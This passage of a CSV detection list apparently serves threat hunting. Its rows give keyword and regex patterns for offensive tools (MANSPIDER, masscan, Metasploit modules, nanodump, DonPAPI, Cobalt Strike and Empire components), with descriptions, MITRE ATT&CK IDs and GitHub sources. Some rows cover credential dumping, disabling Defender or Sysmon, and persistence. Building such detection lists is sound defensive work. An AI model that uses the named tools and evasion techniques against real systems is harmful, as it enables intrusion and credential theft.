scratch","T1024 - T1059 - T1064 - T1002 - T1071","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/malwaredllc/byob","1","0","N/A","N/A","10","8758","2094","2024-04-08T19:52:57Z","2017-12-18T09:10:12Z" "*malwareurl = ""https:*",".{0,1000}malwareurl\s\=\s\""https\:.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*man_in_the_browser.json*",".{0,1000}man_in_the_browser\.json.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*man_spider.manspider:main*",".{0,1000}man_spider\.manspider\:main.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*manage/reflective_dll_inject*",".{0,1000}manage\/reflective_dll_inject.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*ManagedEasyHook.dll*",".{0,1000}ManagedEasyHook\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*manageengine_adselfservice_plus_cve_2022_28810.*",".{0,1000}manageengine_adselfservice_plus_cve_2022_28810\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*manageengine_xnode/CVE*",".{0,1000}manageengine_xnode\/CVE.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*manager/keepass.py*",".{0,1000}manager\/keepass\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*manager/mRemoteNG.py*",".{0,1000}manager\/mRemoteNG\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*mandiant/ADFSDump*",".{0,1000}mandiant\/ADFSDump.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*mandiant/ccmpwn*",".{0,1000}mandiant\/ccmpwn.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","1","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*mandiant/DueDLLigence*",".{0,1000}mandiant\/DueDLLigence.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for 
application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","462","88","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*mandiant/gocrack*",".{0,1000}mandiant\/gocrack.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*mandiant/msi-search*",".{0,1000}mandiant\/msi\-search.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*mandiant/SharPersist*",".{0,1000}mandiant\/SharPersist.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*mandllinject *",".{0,1000}mandllinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","0","N/A","10","10","144","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*manspider * -d * -u * -p *",".{0,1000}manspider\s.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*manspider */24 -f *",".{0,1000}manspider\s.{0,1000}\/24\s\-f\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*manspider --threads * -d * -u * -H * --content admin*",".{0,1000}manspider\s\-\-threads\s.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-H\s.{0,1000}\s\-\-content\sadmin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*manspider*--loot-dir*",".{0,1000}manspider.{0,1000}\-\-loot\-dir.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*manspider*--sharenames*",".{0,1000}manspider.{0,1000}\-\-sharenames.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*manspider.py*",".{0,1000}manspider\.py.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*manspider.spiderling*",".{0,1000}manspider\.spiderling.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*manspider_scan*",".{0,1000}manspider_scan.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*MANSPIDER-master*",".{0,1000}MANSPIDER\-master.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*map_payload_dll*",".{0,1000}map_payload_dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*map-get-tls-alternative-names *",".{0,1000}map\-get\-tls\-alternative\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*mapper_cve_exploit.py*",".{0,1000}mapper_cve_exploit\.py.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","494","109","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" "*masky_dump*",".{0,1000}masky_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*masscan -c *",".{0,1000}masscan\s\-c\s.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*masscan failed with error: *",".{0,1000}masscan\sfailed\swith\serror\:\s.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*masscan --nmap*",".{0,1000}masscan\s\-\-nmap.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*masscan -p*",".{0,1000}masscan\s\-p.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*masscan* -p*",".{0,1000}masscan.{0,1000}\s\s\-p.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*masscan.exe *",".{0,1000}masscan\.exe .{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*massdns -r *.txt*",".{0,1000}massdns\s\-r\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*master/bootkit/src*",".{0,1000}master\/bootkit\/src.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","487","58","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*master/EncryptedZIP*",".{0,1000}master\/EncryptedZIP.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. 
This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*master/HookDetector*",".{0,1000}master\/HookDetector.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*master/ImplantSSP/*",".{0,1000}master\/ImplantSSP\/.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*master/SwampThing*",".{0,1000}master\/SwampThing.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*master/UnquotedPath*",".{0,1000}master\/UnquotedPath.{0,1000}","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*MatheuZSecurity/D3m0n1z3dShell*",".{0,1000}MatheuZSecurity\/D3m0n1z3dShell.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*matterpreter*",".{0,1000}matterpreter.{0,1000}","offensive_tool_keyword","Github Username","github username hosting offensive tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/matterpreter","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*matterpreter/DefenderCheck*",".{0,1000}matterpreter\/DefenderCheck.{0,1000}","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*matterpreter/Shhmon*",".{0,1000}matterpreter\/Shhmon.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*MattKeeley/Spoofy*",".{0,1000}MattKeeley\/Spoofy.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*MayankPandey01/Jira-Lens*",".{0,1000}MayankPandey01\/Jira\-Lens.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","269","38","2024-02-05T10:24:00Z","2021-11-14T18:37:47Z" "*Mazars-Tech/AD_Miner*",".{0,1000}Mazars\-Tech\/AD_Miner.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","AD Enumeration","7","9","808","82","2024-04-17T15:57:37Z","2023-09-26T12:36:59Z" "*mbrg/power-pwn*",".{0,1000}mbrg\/power\-pwn.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation 
tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*mcafee_epo2john.py*",".{0,1000}mcafee_epo2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*McpManagementPotato.*",".{0,1000}McpManagementPotato\..{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*md c:\chaos-container*",".{0,1000}md\sc\:\\chaos\-container.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*Md4-128.unverified.test-vectors.txt*",".{0,1000}Md4\-128\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Md5-128.unverified.test-vectors.txt*",".{0,1000}Md5\-128\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*mDNSSpoofer*",".{0,1000}mDNSSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*mdornseif/DeNiSe*",".{0,1000}mdornseif\/DeNiSe.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - 
TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","10","10","22","10","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z" "*MDSDLL_x64.dll*",".{0,1000}MDSDLL_x64\.dll.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*MDSDLL_x86.dll*",".{0,1000}MDSDLL_x86\.dll.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*mdsecactivebreach*",".{0,1000}mdsecactivebreach.{0,1000}","offensive_tool_keyword","Github Username","MDSecs ActiveBreach Team. 
own a github repo with lots of exploitation tools https://www.mdsec.co.uk/services/red-teaming/","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mdsecactivebreach/CACTUSTORCH*",".{0,1000}mdsecactivebreach\/CACTUSTORCH.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 